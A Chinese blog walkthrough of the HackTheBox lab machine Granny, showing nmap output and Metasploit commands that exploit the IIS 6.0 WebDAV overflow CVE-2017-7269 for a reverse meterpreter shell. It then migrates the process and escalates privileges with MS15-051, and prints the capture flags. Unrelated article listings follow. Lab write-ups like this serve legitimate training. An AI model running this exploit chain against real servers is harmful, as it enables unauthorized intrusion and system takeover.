[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程迁移+MS15-051权限提升

最新推荐文章于 2024-11-03 16:40:52 发布
最新推荐文章于 2024-11-03 16:40:52 发布
阅读量250 收藏 2
点赞数 10
分类专栏: HackTheBox 文章标签: 前端 自动化
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141470805
版权

信息收集

IP AddressOpening Ports
10.10.10.15TCP:80

$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Server Date: Thu, 22 Aug 2024 07:28:25 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

IIS 6.0 & CVE-2017-7269 & BOF

$ msfconsole

msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

image.png

meterpreter > bg

权限提升 & MS15-051

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1

msf6 post(multi/recon/local_exploit_suggester) > run

image-1.png

但是你如果尝试执行权限提升会出现错误

image-2.png

为了确保稳定,进程迁移到davcdata.exe

image-3.png

meterpreter > migrate 2732

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image

msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24

msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1

msf6 exploit(windows/local/ms15_051_client_copy_image) > run

image-4.png

User.txt

700c5dc163014e22b3e408f8703f67d1

Root.txt

aa4beed1c0584445ab463a6747bd06e9

Мартин.
关注
专栏目录
hackthebox-grandpa(考点:iis6.0)不用MSF
冬萍子癸水
04-15 334
这靶机绝大部分人都是msf做的,毕竟适合这个靶机的漏洞文件没多少(还是中国人发现的呢),都是和msf相关,(而且用msf做也很不稳定,这靶机在论坛里也被吐槽),我好不容易找到个非msf的方法 nmap 从名字就可以看出。grandpa老爷爷和granny老奶奶这篇很像,没啥突破口,就是webdav信息多 故地重游 再来扫webdav 但是这次不一样了,都是fail 最后只能网上搜啊搜。。。搜到e...
HTB-oscplike-Bastard+Granny
m0_53302733的博客
04-05 1136
HTB-oscplike-Bastard+Granny Bastard medium难度的bastard 靶机IP 10.10.10.9 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.9 80/tcp open http Microsoft IIS httpd 7.5 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Win
水果数据集(Fruit-Dataset )+水果分类识别训练代码(支持googlenet, resnet, inception_v3, mobilenet_v2)
热门推荐
AI吃大瓜的博客
08-27 4万+
水果数据集,水果分类识别,水果识别,本项目将采用深度学习的方法,搭建一个水果分类识别的训练和测试系统,实现一个简单的水果图像分类识别系统。目前,基于ResNet18的水果分类识别,支持262种水果分类识别,在水果数据集Fruit-Dataset上,训练集的Accuracy在94%左右,测试集的Accuracy在82%左右,骨干网络,可支持googlenet, resnet[18,34,50], inception_v3,mobilenet_v2...
VGG-16图像识别
weixin_43765314的博客
02-15 8702
VGG net VGG net是 Karen simonyan 等人在2015年的CLR会议中公开的神经网络模型。这个模型在2014年的Imagenet比赛中获得了定位第一名和分类第二名的好成绩,它的主要贡献在于利用3×3小卷积核的网络结构对逐渐加深的网络进行评估,结果表明加深网络深度到16至19层可极大提高模型精度。 架构: 训练输入:固定尺寸224×224的RGB图像 预处理:每个像素...
No.55-HackTheBox-windows-Granny-Walkthrough渗透学习
qq_34801745的博客
02-16 1053
** HackTheBox-windows-Granny-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/14 靶机难度:容易(3.0/10) 靶机发布日期:2017年10月12日 靶机描述: Granny, while similar to Grandpa, can be exploited using se...
HackTheBox::Granny
aya3t的博客
10-11 231
HackTheBox::Granny
TOJ 1529. Granny's Bike--哈密顿回路
Shomy的专栏
03-16 921
哈密顿回路
HTB-Granpa and Granny
TA不懒,但还没有添加简介
07-24 157
HTB-Granpa and Granny
HTB-Granny
yutianovo的博客
01-15 447
http://blog.yutian233.xyz/ 靶机描述 清单 信息搜集 nmap iis 6 获取shell iis_webdav_upload_asp 提权 ms15_051_client_copy_image 信息搜集 靶机IP 端口扫描 nmap 10.10.10.15 -A Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS h
granny-js-client::old_woman:Granny.js-JS API客户端
05-09
来自Granny服务器的客户端库 用于Granny图像交付服务器的库 生态系统 backend-公开了API的后端服务,可以上传和提供/处理图像 client-在nodejs和浏览器中均可使用端库。 使API调用更加轻松使用客户端管理CDN域和...
granny-in-minecraft-1552735161.zip
08-10
Granny in Minecraft》是一款基于经典恐怖游戏《Granny》改编的我的世界(Minecraft)模组,将原作的紧张刺激元素融入了这个充满无限可能的沙盒世界。在这个模组中,玩家将体验到与原版游戏相似但又独具特色的恐怖...
granny-chapter-3
03-09
奶奶第3章
Granny-crx插件
04-06
Granny扩展程序可在PC的新选项卡页面上为您提供Granny游戏设计。 专为奶奶迷打造。 格兰尼(Granny)是一款游戏,可将您锁在屋外,并且您将找到逃逸到外界的方法。 采取任何行动都要保持安静,以免在周围有一点噪音...
一些常用的react hooks以及各自的作用
weixin_48602044的博客
11-01 268
关于react hooks的一些知识与应用
做一个能适配「手机」的网站需要注意什么
illidri的博客
11-01 254
像现在主流会采用 H5 响应式布局,仅涉及前端的开发工作,代码量少,效果佳,是一种性价比比较高的选择,如果题主有意要进行网站建站,特别是想要手机浏览也有一定效果,可以选择这种~当然还有一种类似的方式叫自适应布局,俗称 AWD(AdaptiveWebDesign),同样是检测视口分辨率,判断不同尺寸和分辨率是什么设备,从而返回不同布局页面。最根本的区别在于,响应式页面的代码量少,但质量要求高,根据不同分辨率自动调整排版,而自适应页面需要根据不同设备准备不同的页面,这样前期的开发工作就大了很多。
前端 常见开发工具使用
weixin_45534301的博客
10-31 463
【代码】前端 常见开发工具使用。
Google Recaptcha V2 简单使用
吴家健ken的博客
10-30 294
Google Recaptcha V2 简单使用
Maven+Jsp+Vue的文视界创作平台
最新发布
战族狼魂的博客
11-03 79
主要擅长SpringBoot、Vue、SSM、HLMT、Jsp、Nodejs、Python、爬虫、数据可视化、小程序、物联网、前端、数据库等设计与开发;功能设计、功能实现、代码编写、代码调试运行、协助代码逻辑理解、调试过程中问题解决;
Web Broker(Web服务应用程序)入门教程(2)
caridle的专栏
11-03 497
接下来,调度器遍历其动作项列表,寻找与请求消息的目标 URL 的 PathInfo 部分匹配,并且提供请求消息方法所指定的服务的条目。只能有一个动作项是默认动作项。如果已经触发的动作项的 Default 属性被设置为 True,则该动作项不会被重新评估,当调度器到达动作列表末尾时,也不会触发该动作项。在将工作分配给多个动作项时,要么默认动作项的 OnAction 事件处理程序,要么调度器的 AfterDispatch 事件处理程序应该检查所有工作是否完成,如果没有完成,则设置适当的错误代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值